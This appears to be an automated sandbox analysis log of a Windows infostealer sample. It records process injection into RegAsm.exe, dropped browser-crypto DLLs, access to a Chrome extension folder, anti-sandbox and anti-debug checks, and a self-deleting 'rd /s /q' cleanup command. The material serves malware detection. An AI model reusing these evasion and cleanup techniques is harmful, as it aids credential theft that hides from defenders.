                  Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.fileexplorer.common.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntshrui.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dlnashext.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wpdshext.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pcacli.dll
                  Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                  Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                  Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00417645 GetProcAddress (repeated), LoadLibraryA (repeated), GetProcAddress (repeated)
                  Source: softokn3.dll.3.dr Static PE information: section name: .00cfg
                  Source: softokn3[1].dll.3.dr Static PE information: section name: .00cfg
                  Source: freebl3.dll.3.dr Static PE information: section name: .00cfg
                  Source: freebl3[1].dll.3.dr Static PE information: section name: .00cfg
                  Source: mozglue.dll.3.dr Static PE information: section name: .00cfg
                  Source: mozglue[1].dll.3.dr Static PE information: section name: .00cfg
                  Source: msvcp140.dll.3.dr Static PE information: section name: .didat
                  Source: msvcp140[1].dll.3.dr Static PE information: section name: .didat
                  Source: sqlx[1].dll.3.dr Static PE information: section name: .00cfg
                  Source: nss3.dll.3.dr Static PE information: section name: .00cfg
                  Source: nss3[1].dll.3.dr Static PE information: section name: .00cfg
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006E7534 push ecx; ret 0_2_006E7547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004191D5 push ecx; ret 3_2_004191E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C6FB536 push ecx; ret 3_2_6C6FB549
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                  Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                  Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\GHIJJEGDBFII\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\GHIJJEGDBFII\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\GHIJJEGDBFII\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 6.2 %
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 2576Thread sleep count: 88 > 30Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h3_2_0040FCE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F81B2 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_006F81B2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,3_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_004162AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,3_2_004153F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040B463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_004094E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040C679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_00415AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_00409F72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_00409900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,3_2_0040A981
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,3_2_00415E66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,3_2_00415843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FE81 GetSystemInfo,wsprintfA,3_2_0040FE81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: RegAsm.exe, 00000003.00000002.2040315374.0000000003465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_3-95543
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7B35 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006E7B35
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F2E07 mov eax, dword ptr fs:[00000030h]0_2_006F2E07
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F0040 mov ecx, dword ptr fs:[00000030h]0_2_006F0040
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F2E4B mov eax, dword ptr fs:[00000030h]0_2_006F2E4B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB84A GetProcessHeap,0_2_006FB84A
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7810 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006E7810
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7C91 SetUnhandledExceptionFilter,0_2_006E7C91
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EC606 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006EC606
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041937F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041E438 SetUnhandledExceptionFilter,3_2_0041E438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041A8A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C6FB66C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C6FB1F7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C8AAC62

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6856, type: MEMORYSTR
